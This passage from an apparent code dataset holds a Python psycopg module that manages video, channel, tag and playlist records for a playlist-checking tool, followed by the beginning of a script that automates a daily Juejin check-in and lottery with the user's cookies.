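assert magnitude_recursive([[1, 2], [[3, 4], 5]]) == 143

This one pass replaces both the while recursive_len(...) > 2 loop and the final sf_number[0] * 3 + sf_number[1] * 2 step.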
cur.execute(sql, (playlist_id, name, site))\n return cur.fetchone()\n\n @transaction()\n def update_archived_playlist_videos(self, playlist_id: int, cur: Cursor = NotImplemented):\n \"\"\"\n Use when archive property is set to true on a playlist.\n Will set the download flag to true on each video in the playlist\n \"\"\"\n sql = '''\n UPDATE videos v SET download=TRUE\n FROM playlistvideos pv\n WHERE pv.playlist_id=%s AND v.id=pv.video_id AND v.download=FALSE\n '''\n cur.execute(sql, (playlist_id,))\n logger.info(f'Set download col for {cur.rowcount} videos')\n\n @transaction(real_transaction=True)\n def add_and_update_vids(self, videos: Iterable[BaseVideo], existing_ids: set[str], site: int | Site, cur: Cursor = NotImplemented):\n \"\"\"\n Adds new videos to database and updates the following properties from\n duplicate entries:\n title, description, thumbnail url, publish date\n also sets the deleted flag to False\n\n Do not give deleted videos to this function. It will set the deleted\n flag to true on them\n\n Args:\n videos:\n Iterable of :class:BaseVideo that will be added or updated\n existing_ids:\n Set of all video ids that are in the database for the given site.\n site:\n id of the site being used\n cur:\n Optional cursor\n \"\"\"\n videos_set = set(videos)\n # We can't use intersection because it wouldn't give our custom object\n # instead it always would give a set of values used for comparison\n do_insert = videos_set - existing_ids\n do_update = videos_set - do_insert\n\n if not (do_insert or do_update):\n return\n\n site = int(site)\n\n if do_insert:\n sql = 'INSERT INTO videos AS v (video_id, title, description, published_at, site, thumbnail) ' \\\n 'VALUES %s'\n\n values = tuple(\n (vid.video_id, vid.title, vid.description, vid.published_at, site, vid.thumbnail)\n for vid in do_insert\n )\n\n execute_values(cur, sql, values, page_size=500)\n\n if do_update:\n # https://stackoverflow.com/a/18799497/6046713\n sql = 'UPDATE videos AS v SET ' \\\n 'title=CASE WHEN v.title!=c.title THEN c.title ELSE v.title END, ' \\\n 'description=CASE WHEN v.description!=c.description THEN c.description ELSE v.description END, ' \\\n 'deleted=FALSE,' \\\n 'thumbnail=COALESCE(c.thumbnail, v.thumbnail), ' \\\n 'published_at=CASE WHEN c.published_at >= v.published_at THEN v.published_at ELSE c.published_at END ' \\\n 'FROM (VALUES %s) AS c(video_id, title, description, published_at, site, thumbnail) ' \\\n 'WHERE c.site=v.site AND c.video_id=v.video_id'\n\n values = tuple(\n (vid.video_id, vid.title, vid.description, vid.published_at, site, vid.thumbnail)\n for vid in do_update\n )\n\n execute_values(cur, sql, values, page_size=500)\n\n @transaction(real_transaction=True)\n def add_deleted_vids(self, videos: Iterable[BaseVideo], existing_ids: set[str], site: int | Site, cur: Cursor = NotImplemented):\n \"\"\"\n Sets the deleted flag on the videos provided and also sets the\n deletion time column if the deleted flag hasn't been set before\n\n Args:\n videos:\n Iterable of BaseVideo that are deleted\n site:\n id of the site being used\n cur:\n Optional cursor\n \"\"\"\n videos = set(videos)\n do_insert = videos - existing_ids\n do_update = videos - do_insert\n\n if not (do_insert or do_update):\n return\n\n site = int(site)\n if do_insert:\n t = datetime.now(timezone.utc)\n sql = 'INSERT INTO videos (video_id, title, published_at, site, deleted, deleted_at) VALUES %s'\n\n values = tuple((vid.video_id, t, t) for vid in do_insert)\n\n execute_values(cur, sql, values, page_size=1000, template=f\"(%s, 
'Deleted video', %s, {site}, True, %s)\")\n\n if do_update:\n sql = 'UPDATE videos AS v SET ' \\\n 'deleted_at=CASE WHEN v.deleted=FALSE THEN CURRENT_TIMESTAMP ELSE v.deleted_at END, ' \\\n 'deleted=TRUE ' \\\n 'WHERE site=%s AND video_id=ANY(%s)'\n\n cur.execute(sql, [site, [v.video_id for v in do_update]])\n\n @transaction(no_cursor=True, real_transaction=True)\n def add_vid_tags(self,\n videos: set[BaseVideo],\n cached_tags: dict[str, int],\n all_videos: dict[str, int],\n default_tags: list[str] = None):\n \"\"\"\n Adds missing tags to the database based on the provided videos.\n Also updates cached_tags and all_videos\n\n Args:\n videos:\n List of videos from which the tags will be added\n cached_tags:\n tags that have already been cached to memory\n all_videos:\n All videos stored in the db of the specified site.\n default_tags:\n An list of tag names to be applied to every video in the videos\n param\n \"\"\"\n default_tags = [] if not default_tags else default_tags\n tag_values: set[str] = set(default_tags)\n cached_tag_names = set(cached_tags.keys())\n\n # Copy the list of videos since we don't want to edit the original list\n videos = videos.copy()\n for vid in videos.copy(): # This copy is probably needed\n if not vid.data:\n videos.remove(vid)\n continue\n\n tags = vid.tags\n if not tags:\n videos.remove(vid)\n continue\n\n tag_values.update(map(str.lower, tags))\n\n # Get non cached tags and add them to db\n tobecached = tag_values - cached_tag_names\n\n if tobecached:\n sql = 'INSERT INTO tags (tag) VALUES %s ON CONFLICT DO NOTHING RETURNING tag, id'\n with self.class_cursor(models.Tag) as cursor:\n results: list[models.Tag] = execute_values(cursor, sql,\n [(x,) for x in tobecached],\n page_size=1000, fetch=True)\n\n for tag in results:\n cached_tags[tag.tag] = tag.id\n\n values = []\n for vid in videos:\n video_id = all_videos.get(vid.video_id)\n if not video_id:\n logger.warning('Video id not found with %s' % vid)\n continue\n\n # Add video specific tags\n for tag in vid.tags:\n tag_id = cached_tags.get(tag.lower())\n if not tag_id:\n logger.warning('Tag %s not found' % tag)\n continue\n\n values.append((tag_id, video_id))\n\n # Add default tags\n for default_tag in default_tags:\n tag_id = cached_tags.get(default_tag.lower())\n if not tag_id:\n logger.warning('Tag %s not found' % default_tag)\n continue\n\n values.append((tag_id, video_id))\n\n sql = 'INSERT INTO videoTags (tag_id, video_id) VALUES %s ON CONFLICT DO NOTHING '\n\n with self.conn.cursor() as cursor:\n execute_values(cursor, sql, values, page_size=2000)\n\n @transaction(real_transaction=True)\n def add_channels(self, channels: Iterable[BaseChannel], channel_cache: set[str], site: int | Site, cur: Cursor = NotImplemented):\n \"\"\"\n Adds channels to db and updates old entries\n Columns updated are as follows:\n name and thumbnail aka profile pic\n\n Args:\n channels: iterable of channels to add\n channel_cache: Set of all channels ids in db\n site: id of the site\n cur: Optional cursor\n\n \"\"\"\n site = int(site)\n channels = set(channels)\n do_insert = channels - cast(set[BaseChannel], channel_cache)\n do_update = channels - do_insert\n\n if not (do_insert or do_update):\n return\n\n if do_insert:\n sql = 'INSERT INTO channels (channel_id, name, thumbnail, site) VALUES %s'\n\n execute_values(cur, sql, [(c.channel_id, c.name, c.thumbnail, site) for c in do_insert], page_size=1000)\n\n channel_cache.update([c.channel_id for c in do_insert])\n\n if do_update:\n sql = 'UPDATE channels AS c SET ' \\\n 
'name=COALESCE(v.name, c.name), ' \\\n 'thumbnail=COALESCE(v.thumbnail, c.thumbnail) ' \\\n 'FROM (VALUES %s) AS v(channel_id, name, thumbnail) ' \\\n 'WHERE v.channel_id=c.channel_id'\n\n execute_values(cur, sql, [(c.channel_id, c.name, c.thumbnail) for c in do_update], page_size=1000)\n\n @transaction(no_cursor=True)\n def add_channel_videos(self,\n videos: Iterable[BaseVideo],\n channels: Sequence[BaseChannel | str],\n channel_cache: set[str],\n db_videos: dict[str, int],\n site: int | Site):\n \"\"\"\n Link video ids to channel ids in the channelVideos table\n This will handle adding missing channels for you. The videos need\n to have the channel property set to for this to work\n\n Args:\n videos: List of :class:BaseVideo instances\n channels: List of BaseChannel instances and channel_ids as str\n channel_cache: List of cached channel ids\n db_videos: video_id to db id\n site: id of the site being used\n \"\"\"\n self.add_channels([c for c in channels if not isinstance(c, str)], channel_cache, site)\n sql = 'SELECT id, channel_id FROM channels WHERE channel_id=ANY(%s)'\n\n channel_ids = {}\n with self.class_cursor(models.Channel) as cursor:\n cursor.execute(sql, [[c if isinstance(c, str) else c.channel_id for c in channels]])\n\n for row in cursor:\n channel_ids[row.channel_id] = row.id\n\n data = []\n\n for vid in videos:\n channel_id = channel_ids.get(vid.channel_id)\n if not channel_id:\n logger.warning(f'Channel not found for video {vid}')\n continue\n\n vid_id = db_videos.get(vid.video_id)\n if not vid_id:\n continue\n\n data.append((channel_id, vid_id))\n\n sql = 'INSERT INTO channelVideos (channel_id, video_id) VALUES %s ON CONFLICT DO NOTHING'\n with self.conn.cursor() as cursor:\n execute_values(cursor, sql, data, page_size=2000)\n\n @transaction()\n def add_playlist_vids(self, playlist_id: int, video_ids: Iterable[int], cur: Cursor = NotImplemented):\n \"\"\"\n Add video playlist connection to the playlistVideos table\n\n Args:\n playlist_id:\n The database id for the playlist\n video_ids:\n An iterable of database ids for videos that are added the\n specified playlist\n cur: optional cursor\n \"\"\"\n sql = 'INSERT INTO playlistVideos (playlist_id, video_id) VALUES ' \\\n '%s ON CONFLICT DO NOTHING'\n\n values = tuple((playlist_id, video_id) for video_id in video_ids)\n\n execute_values(cur, sql, values, page_size=2000)\n\n @transaction()\n def update_removed_playlist_videos(self, playlist_id: int, video_ids: list[int], cur: Cursor = NotImplemented):\n \"\"\"\n Removes playlist videos that are not found in the video_ids iterable.\n \"\"\"\n sql = 'DELETE FROM playlistvideos WHERE playlist_id=%s AND NOT video_id=ANY(%s)'\n cur.execute(sql, [playlist_id, video_ids])\n logger.info(f'User removed {cur.rowcount} videos from playlist {playlist_id}')\n\n @transaction(row_factory=class_row(models.PartialVideo))\n def get_vid_ids(self, vid_ids: list[str], site: int | Site, cur: Cursor[models.PartialVideo] = NotImplemented) -> dict[str, int]:\n \"\"\"\n Gets the database ids to the corresponding video ids\n\n Args:\n vid_ids:\n list of video ids of the specified site.\n site:\n ID of the site being used\n\n Returns:\n dict: a dictionary of type {str: int} aka {video_id: database_id}\n \"\"\"\n site = int(site)\n sql = f'SELECT id, video_id, site FROM videos WHERE site={site} AND video_id=ANY(%s)'\n\n cur.execute(sql, [vid_ids])\n vid_ids = {vid.video_id: vid.id for vid in cur}\n\n return vid_ids\n\n @transaction(row_factory=class_row(models.PlaylistVideo))\n def 
get_playlist_video_ids(self, playlist_id: int, cur: Cursor[models.PlaylistVideo] = NotImplemented) -> list[models.PlaylistVideo]:\n \"\"\"\n Gets all video ids that are associated with this playlist\n Args:\n playlist_id: id of the playlist\n cur: Optional cursor\n Returns:\n list:\n A list PlaylistVideo objects with the video_id property set\n \"\"\"\n sql = 'SELECT video_id FROM playlistVideos WHERE playlist_id=%s'\n cur.execute(sql, (playlist_id,))\n return cur.fetchall()\n\n @transaction(row_factory=class_row(models.VideoExtraFiles))\n def get_extra_files(self, video_id: int, cur: Cursor[models.VideoExtraFiles] = NotImplemented) -> Optional[models.VideoExtraFiles]:\n sql = 'SELECT * FROM extra_video_files WHERE video_id=%s'\n cur.execute(sql, (video_id,))\n return cur.fetchone()\n\n @transaction(row_factory=class_row(models.PartialVideo))\n def get_thumbnails_to_dl(self, site: int | Site, cur: Cursor[models.PartialVideo] = NotImplemented) -> list[models.PartialVideo]:\n \"\"\"\n Finds videos without thumbnail set in extra files\n \"\"\"\n sql = '''\n SELECT v.video_id, v.id FROM videos v\n LEFT JOIN extra_video_files evf ON v.id = evf.video_id\n WHERE v.site=%s AND v.deleted=FALSE AND evf.thumbnail IS NULL AND \n (v.download=FALSE OR (v.force_redownload=FALSE AND v.downloaded_format IS NOT NULL))\n '''\n cur.execute(sql, (int(site),))\n return cur.fetchall()\n\n def iter_videos_to_download(self, playlist_ids: list[int] = None) -> Generator[models.Video, None, None]:\n where = '((download=TRUE or force_redownload=TRUE) AND deleted=FALSE)'\n join = ''\n args = ()\n\n if playlist_ids:\n where = 'pv.playlist_id=ANY(%s) AND ' + where\n join = 'INNER JOIN playlistvideos pv ON v.id = pv.video_id'\n args = [playlist_ids]\n\n sql = f'''\n SELECT DISTINCT ON (id) id, site, v.video_id, downloaded_format, downloaded_filename, download_format, force_redownload, container_override\n FROM videos v\n {join}\n WHERE {where}\n '''\n\n with self.class_cursor(models.Video) as cursor:\n cursor.execute(sql, args)\n for row in cursor:\n yield row\n\n @transaction()\n def update_vid_filename(self, filename: Optional[str], downloaded_format: Optional[str], video_id: int, cur: Cursor = NotImplemented):\n sql = '''\n UPDATE videos SET \n downloaded_filename=COALESCE(%s, downloaded_filename), \n downloaded_format=COALESCE(%s, downloaded_format), \n force_redownload=FALSE\n WHERE id=%s\n '''\n cur.execute(sql, (filename, downloaded_format, video_id))\n\n @transaction()\n def update_filename(self, filename: str, video_id: int, cur: Cursor = NotImplemented):\n cur.execute('UPDATE videos SET downloaded_filename=%s WHERE id=%s', (filename, video_id))\n\n @transaction()\n def update_extra_files(self, model: models.VideoExtraFiles, cur: Cursor = NotImplemented):\n sql = '''\n INSERT INTO extra_video_files as e (video_id, thumbnail, info_json, other_files, audio_file, subtitles) \n VALUES (%s, %s, %s, %s, %s, %s)\n ON CONFLICT (video_id) DO UPDATE \n SET thumbnail=COALESCE(EXCLUDED.thumbnail, e.thumbnail), \n info_json=COALESCE(EXCLUDED.info_json, e.info_json), \n other_files=COALESCE(EXCLUDED.other_files, e.other_files),\n audio_file=COALESCE(EXCLUDED.audio_file, e.audio_file),\n subtitles=COALESCE(EXCLUDED.subtitles, e.subtitles)\n '''\n other_files = Json(model.other_files) if model.other_files else None\n cur.execute(sql, (model.video_id, model.thumbnail, model.info_json, other_files, model.audio_file, model.subtitles or None))\n\n @transaction()\n def videos_for_script(self, videos: set[BaseVideo], site: int | Site, 
cur: Cursor = NotImplemented) -> list[models.VideoToScript]:\n        \"\"\"\n        Transforms the given set of videos into a list that can be passed to a script\n        \"\"\"\n        site = int(site)\n        sql = f'''\n            SELECT v.video_id, v.title, c.name, c.channel_id, v.downloaded_filename, v.deleted_at, v.published_at\n            FROM videos v \n            LEFT JOIN channelVideos cv ON cv.video_id=v.id \n            LEFT JOIN channels c ON cv.channel_id = c.id\n            WHERE v.site=%s AND v.video_id=ANY(%s)\n        '''\n\n        cur.execute(sql, [site, [vid.video_id for vid in videos]])\n        retval = []\n\n        for row in cur:\n            video_id = row['video_id']\n            video = None\n            for vid in videos:\n                if vid.video_id == video_id:\n                    video = vid\n                    break\n\n            if not video:\n                logger.warning('Video not found in database when it should have been added')\n                continue\n\n            retval.append(models.VideoToScript.from_row(row))\n\n        return retval\n\n    @transaction()\n    def get_deleted_info(self, deleted: set[BaseVideo], site: int | Site, cur: Cursor = NotImplemented) -> list[models.VideoToScript]:\n        \"\"\"\n        Updates BaseVideo objects with cached info from database\n        Namely updates title, channel name and channel id\n\n        Args:\n            deleted:\n                List of the videos to be updated\n            site:\n                Id of the site used\n            cur: optional cursor\n\n        Returns:\n            list of videos that can be passed to a script\n\n        \"\"\"\n        if not deleted:\n            return []\n\n        deleted = deleted.copy()\n\n        site = int(site)\n        sql = f'''\n            SELECT v.video_id, v.title, c.name, c.channel_id, v.downloaded_filename, v.deleted_at, v.published_at\n            FROM videos v \n            LEFT JOIN channelVideos cv ON cv.video_id=v.id \n            LEFT JOIN channels c ON cv.channel_id = c.id\n            WHERE v.site=%s AND v.video_id=ANY(%s)\n        '''\n\n        cur.execute(sql, [site, [vid.video_id for vid in deleted]])\n        retval = []\n\n        for row in cur:\n            video_id = row['video_id']\n            video = None\n            for vid in deleted:\n                if vid.video_id == video_id:\n                    video = vid\n                    break\n\n            if not video:\n                continue\n\n            deleted.remove(video)\n            retval.append(models.VideoToScript.from_row(row))\n\n        for vid in deleted:\n            retval.append(models.VideoToScript(\n                id=vid.video_id,\n                title=vid.title or 'Deleted video',\n                channel_id=vid.channel_id,\n                channel_name=vid.channel_name,\n                filename=None,\n                deleted_at=datetime.now(timezone.utc),\n                published_at=None\n            ))\n\n        return retval\n\n    @transaction(row_factory=class_row(models.Video))\n    def get_new_deleted(self, deleted: set[BaseVideoT], site: int | Site,\n                        cur: Cursor[models.Video] = NotImplemented) -> set[BaseVideoT]:\n        \"\"\"\n        Gets the newly deleted videos from the specified site with\n        updated titles\n\n        Args:\n            deleted:\n                List of all deleted vids from a site.\n            site:\n                id of the site currently in use\n            cur: optional cursor\n\n        Returns:\n            set: A set of BaseVideo objects with updated titles\n        \"\"\"\n        if not deleted:\n            return set()\n\n        site = int(site)\n        sql = f'SELECT id, title, video_id FROM videos WHERE deleted IS FALSE AND site=%s' \\\n              ' AND video_id=ANY(%s)'\n\n        new_deleted = set()\n        cur.execute(sql, [site, [vid.video_id for vid in deleted]])\n\n        for video_partial in cur:\n            video_id = video_partial.video_id\n            video = None\n            for vid in deleted:\n                if vid.video_id == video_id:\n                    video = vid\n                    break\n\n            if not video:\n                continue\n\n            video.title = video_partial.title\n            new_deleted.add(video)\n\n        return new_deleted\n", "repo_name": "s0hv/playlist-checker", "sub_path": "src/db/dbutils.py", "file_name": "dbutils.py", "file_ext": "py", "file_size_in_byte": 24201, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": 
"logging.getLogger", "line_number": 17, "usage_type": "call"}, {"api_name": "typing.TypeVar", "line_number": 19, "usage_type": "call"}, {"api_name": "psycopg.Cursor", "line_number": 19, "usage_type": "name"}, {"api_name": "typing.TypeVar", "line_number": 20, "usage_type": "call"}, {"api_name": "psycopg.Connection", "line_number": 20, "usage_type": "name"}, {"api_name": "typing.TypeVar", "line_number": 21, "usage_type": "call"}, {"api_name": "src.video.BaseVideo", "line_number": 21, "usage_type": "name"}, {"api_name": "typing.ParamSpec", "line_number": 24, "usage_type": "call"}, {"api_name": "typing.TypeVar", "line_number": 25, "usage_type": "call"}, {"api_name": "psycopg.rows.BaseRowFactory", "line_number": 28, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 29, "usage_type": "name"}, {"api_name": "typing.Concatenate", "line_number": 29, "usage_type": "name"}, {"api_name": "typing.Type", "line_number": 65, "usage_type": "name"}, {"api_name": "psycopg.rows.class_row", "line_number": 66, "usage_type": "call"}, {"api_name": "contextlib.contextmanager", "line_number": 64, "usage_type": "name"}, {"api_name": "psycopg.Cursor", "line_number": 65, "usage_type": "name"}, {"api_name": "src.enum.Site", "line_number": 72, "usage_type": "name"}, {"api_name": "psycopg.Cursor", "line_number": 73, "usage_type": "name"}, {"api_name": "src.db.models.Playlist", "line_number": 73, "usage_type": "attribute"}, {"api_name": "src.db.models", "line_number": 73, "usage_type": "name"}, {"api_name": "psycopg.rows.class_row", "line_number": 71, "usage_type": "call"}, {"api_name": "src.db.models.Playlist", "line_number": 71, "usage_type": "attribute"}, {"api_name": "src.db.models", "line_number": 71, "usage_type": "name"}, {"api_name": "psycopg.Cursor", "line_number": 97, "usage_type": "name"}, {"api_name": "typing.Iterable", "line_number": 111, "usage_type": "name"}, {"api_name": "src.video.BaseVideo", "line_number": 111, "usage_type": "name"}, {"api_name": "src.enum.Site", "line_number": 111, "usage_type": "name"}, {"api_name": "psycopg.Cursor", "line_number": 111, "usage_type": "name"}, {"api_name": "src.db.utils.execute_values", "line_number": 151, "usage_type": "call"}, {"api_name": "src.db.utils.execute_values", "line_number": 169, "usage_type": "call"}, {"api_name": "typing.Iterable", "line_number": 172, "usage_type": "name"}, {"api_name": "src.video.BaseVideo", "line_number": 172, "usage_type": "name"}, {"api_name": "src.enum.Site", "line_number": 172, "usage_type": "name"}, {"api_name": "psycopg.Cursor", "line_number": 172, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 194, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 194, "usage_type": "name"}, {"api_name": "datetime.timezone.utc", "line_number": 194, "usage_type": "attribute"}, {"api_name": "datetime.timezone", "line_number": 194, "usage_type": "name"}, {"api_name": "src.db.utils.execute_values", "line_number": 199, "usage_type": "call"}, {"api_name": "src.video.BaseVideo", "line_number": 211, "usage_type": "name"}, {"api_name": "src.db.models.Tag", "line_number": 253, "usage_type": "attribute"}, {"api_name": "src.db.models", "line_number": 253, "usage_type": "name"}, {"api_name": "src.db.models.Tag", "line_number": 254, "usage_type": "attribute"}, {"api_name": "src.db.models", "line_number": 254, "usage_type": "name"}, {"api_name": "src.db.utils.execute_values", "line_number": 254, "usage_type": "call"}, {"api_name": "src.db.utils.execute_values", "line_number": 289, 
"usage_type": "call"}, {"api_name": "typing.Iterable", "line_number": 292, "usage_type": "name"}, {"api_name": "src.channel.BaseChannel", "line_number": 292, "usage_type": "name"}, {"api_name": "src.enum.Site", "line_number": 292, "usage_type": "name"}, {"api_name": "psycopg.Cursor", "line_number": 292, "usage_type": "name"}, {"api_name": "typing.cast", "line_number": 307, "usage_type": "call"}, {"api_name": "src.channel.BaseChannel", "line_number": 307, "usage_type": "name"}, {"api_name": "src.db.utils.execute_values", "line_number": 316, "usage_type": "call"}, {"api_name": "src.db.utils.execute_values", "line_number": 327, "usage_type": "call"}, {"api_name": "typing.Iterable", "line_number": 331, "usage_type": "name"}, {"api_name": "src.video.BaseVideo", "line_number": 331, "usage_type": "name"}, {"api_name": "typing.Sequence", "line_number": 332, "usage_type": "name"}, {"api_name": "src.channel.BaseChannel", "line_number": 332, "usage_type": "name"}, {"api_name": "src.enum.Site", "line_number": 335, "usage_type": "name"}, {"api_name": "src.db.models.Channel", "line_number": 352, "usage_type": "attribute"}, {"api_name": "src.db.models", "line_number": 352, "usage_type": "name"}, {"api_name": "src.db.utils.execute_values", "line_number": 374, "usage_type": "call"}, {"api_name": "typing.Iterable", "line_number": 377, "usage_type": "name"}, {"api_name": "psycopg.Cursor", "line_number": 377, "usage_type": "name"}, {"api_name": "src.db.utils.execute_values", "line_number": 394, "usage_type": "call"}, {"api_name": "psycopg.Cursor", "line_number": 397, "usage_type": "name"}, {"api_name": "src.enum.Site", "line_number": 406, "usage_type": "name"}, {"api_name": "psycopg.Cursor", "line_number": 406, "usage_type": "name"}, {"api_name": "src.db.models.PartialVideo", "line_number": 406, "usage_type": "attribute"}, {"api_name": "src.db.models", "line_number": 406, "usage_type": "name"}, {"api_name": "psycopg.rows.class_row", "line_number": 405, "usage_type": "call"}, {"api_name": "src.db.models.PartialVideo", "line_number": 405, "usage_type": "attribute"}, {"api_name": "src.db.models", "line_number": 405, "usage_type": "name"}, {"api_name": "psycopg.Cursor", "line_number": 428, "usage_type": "name"}, {"api_name": "src.db.models.PlaylistVideo", "line_number": 428, "usage_type": "attribute"}, {"api_name": "src.db.models", "line_number": 428, "usage_type": "name"}, {"api_name": "psycopg.rows.class_row", "line_number": 427, "usage_type": "call"}, {"api_name": "src.db.models.PlaylistVideo", "line_number": 427, "usage_type": "attribute"}, {"api_name": "src.db.models", "line_number": 427, "usage_type": "name"}, {"api_name": "psycopg.Cursor", "line_number": 443, "usage_type": "name"}, {"api_name": "src.db.models.VideoExtraFiles", "line_number": 443, "usage_type": "attribute"}, {"api_name": "src.db.models", "line_number": 443, "usage_type": "name"}, {"api_name": "psycopg.rows.class_row", "line_number": 442, "usage_type": "call"}, {"api_name": "src.db.models.VideoExtraFiles", "line_number": 442, "usage_type": "attribute"}, {"api_name": "src.db.models", "line_number": 442, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 443, "usage_type": "name"}, {"api_name": "src.enum.Site", "line_number": 449, "usage_type": "name"}, {"api_name": "psycopg.Cursor", "line_number": 449, "usage_type": "name"}, {"api_name": "src.db.models.PartialVideo", "line_number": 449, "usage_type": "attribute"}, {"api_name": "src.db.models", "line_number": 449, "usage_type": "name"}, {"api_name": "psycopg.rows.class_row", 
"line_number": 448, "usage_type": "call"}, {"api_name": "src.db.models.PartialVideo", "line_number": 448, "usage_type": "attribute"}, {"api_name": "src.db.models", "line_number": 448, "usage_type": "name"}, {"api_name": "src.db.models.Video", "line_number": 479, "usage_type": "attribute"}, {"api_name": "src.db.models", "line_number": 479, "usage_type": "name"}, {"api_name": "typing.Generator", "line_number": 462, "usage_type": "name"}, {"api_name": "src.db.models.Video", "line_number": 462, "usage_type": "attribute"}, {"api_name": "src.db.models", "line_number": 462, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 485, "usage_type": "name"}, {"api_name": "psycopg.Cursor", "line_number": 485, "usage_type": "name"}, {"api_name": "psycopg.Cursor", "line_number": 496, "usage_type": "name"}, {"api_name": "src.db.models.VideoExtraFiles", "line_number": 500, "usage_type": "attribute"}, {"api_name": "src.db.models", "line_number": 500, "usage_type": "name"}, {"api_name": "psycopg.Cursor", "line_number": 500, "usage_type": "name"}, {"api_name": "psycopg.types.json.Json", "line_number": 511, "usage_type": "call"}, {"api_name": "src.video.BaseVideo", "line_number": 515, "usage_type": "name"}, {"api_name": "src.enum.Site", "line_number": 515, "usage_type": "name"}, {"api_name": "psycopg.Cursor", "line_number": 515, "usage_type": "name"}, {"api_name": "src.db.models.VideoToScript.from_row", "line_number": 543, "usage_type": "call"}, {"api_name": "src.db.models.VideoToScript", "line_number": 543, "usage_type": "attribute"}, {"api_name": "src.db.models", "line_number": 543, "usage_type": "name"}, {"api_name": "src.db.models.VideoToScript", "line_number": 515, "usage_type": "attribute"}, {"api_name": "src.db.models", "line_number": 515, "usage_type": "name"}, {"api_name": "src.video.BaseVideo", "line_number": 548, "usage_type": "name"}, {"api_name": "src.enum.Site", "line_number": 548, "usage_type": "name"}, {"api_name": "psycopg.Cursor", "line_number": 548, "usage_type": "name"}, {"api_name": "src.db.models.VideoToScript.from_row", "line_number": 593, "usage_type": "call"}, {"api_name": "src.db.models.VideoToScript", "line_number": 593, "usage_type": "attribute"}, {"api_name": "src.db.models", "line_number": 593, "usage_type": "name"}, {"api_name": "src.db.models.VideoToScript", "line_number": 596, "usage_type": "call"}, {"api_name": "src.db.models", "line_number": 596, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 602, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 602, "usage_type": "name"}, {"api_name": "datetime.timezone.utc", "line_number": 602, "usage_type": "attribute"}, {"api_name": "datetime.timezone", "line_number": 602, "usage_type": "name"}, {"api_name": "src.db.models.VideoToScript", "line_number": 548, "usage_type": "attribute"}, {"api_name": "src.db.models", "line_number": 548, "usage_type": "name"}, {"api_name": "src.enum.Site", "line_number": 609, "usage_type": "name"}, {"api_name": "psycopg.Cursor", "line_number": 610, "usage_type": "name"}, {"api_name": "src.db.models.Video", "line_number": 610, "usage_type": "attribute"}, {"api_name": "src.db.models", "line_number": 610, "usage_type": "name"}, {"api_name": "psycopg.rows.class_row", "line_number": 608, "usage_type": "call"}, {"api_name": "src.db.models.Video", "line_number": 608, "usage_type": "attribute"}, {"api_name": "src.db.models", "line_number": 608, "usage_type": "name"}]} +{"seq_id": "10543380884", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 
-*-\n# @Time : 2021-12-10 17:12\n# @Author : jiale\n# @Site : Juejin daily check-in: collect ore and enter the lottery\n# @File : juejin.py\n# @Software: PyCharm\nimport json\n\nimport requests\n\nfrom common import constants\nfrom common.title_type import TitleType\n\n\nclass JueJinCheckin:\n\n    def __init__(self):\n        self.header = {\n            \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36\",\n            \"Content-Type\": \"text/json; charset=utf-8\"\n        }\n        cookies_str = constants.juejin_cookie\n        cookies_dict = {}\n        for cookie in cookies_str.split('; '):\n            cookies_dict[cookie.split('=')[0]] = cookie.split('=')[-1]\n        self.cookies = cookies_dict\n\n    # Check in\n    def checkin(self):\n        checkin_url = \"https://api.juejin.cn/growth_api/v1/check_in\"\n        response = requests.post(url=checkin_url, cookies=self.cookies)\n        resp_data = json.loads(response.text)\n        print(\"%s check-in response: %s\" % (TitleType.JueJin.value[0], resp_data))\n        if 0 == resp_data[\"err_no\"]:\n            if resp_data[\"err_msg\"] == 'success':\n                return \"Check-in succeeded, ore gained: %dM\" % (resp_data[\"data\"][\"incr_point\"])\n            else:\n                return \"Check-in failed: %s\" % resp_data[\"err_msg\"]\n        else:\n            return \"Check-in failed, %s\" % resp_data[\"err_msg\"]\n\n    # Get total ore count\n    def get_cur_point(self):\n        info_url = \"https://api.juejin.cn/growth_api/v1/get_cur_point\"\n        response = requests.get(url=info_url, cookies=self.cookies)\n        # Response: {\"err_no\":0,\"err_msg\":\"success\",\"data\":766}\n        resp_data = json.loads(response.text)\n        print(\"%s total ore response: %s\" % (TitleType.JueJin.value[0], resp_data))\n\n    # Get the list of draws available for \"dip luck\"\n    def dip_luck_list(self):\n        data = {\"page_no\": 1, \"page_size\": 5}\n        list_url = \"https://api.juejin.cn/growth_api/v1/lottery_history/global_big\"\n        response = requests.post(url=list_url, json=data, cookies=self.cookies)\n        resp_data = json.loads(response.text)\n        if 0 == resp_data[\"err_no\"]:\n            lottery = resp_data[\"data\"][\"lotteries\"][0]\n            # Dip luck from this draw\n            return self.dip_luck(lottery[\"history_id\"])\n        else:\n            return \"Failed to get the dip luck list: %s\" % resp_data[\"err_msg\"]\n\n    # Dip luck\n    def dip_luck(self, history_id):\n        info_url = \"https://api.juejin.cn/growth_api/v1/lottery_lucky/dip_lucky\"\n        data = {\n            \"lottery_history_id\": history_id\n        }\n        response = requests.post(url=info_url, json=data, cookies=self.cookies)\n        # Response: {\"err_no\":0,\"err_msg\":\"success\",\"data\":{\"dip_action\":1,\"has_dip\":false,\"total_value\":1679,\"dip_value\":10}}\n        resp_data = json.loads(response.text)\n        print(\"%s dip luck response: %s\" % (TitleType.JueJin.value[0], resp_data))\n        if 0 == resp_data[\"err_no\"]:\n            if resp_data[\"err_msg\"] == 'success':\n                return \"Dip luck succeeded, lucky points gained: %d\" % (resp_data[\"data\"][\"dip_value\"])\n            else:\n                return \"Dip luck failed: %s\" % resp_data[\"err_msg\"]\n        else:\n            return \"Dip luck failed, %s\" % resp_data[\"err_msg\"]\n\n    # Get lottery info\n    def get_draw_info(self):\n        info_url = \"https://api.juejin.cn/growth_api/v1/lottery_config/get\"\n        response = requests.get(url=info_url, cookies=self.cookies)\n        # Response: {\"err_no\":0,\"err_msg\":\"success\",\"data\":true}\n        resp_data = json.loads(response.text)\n        print(\"%s 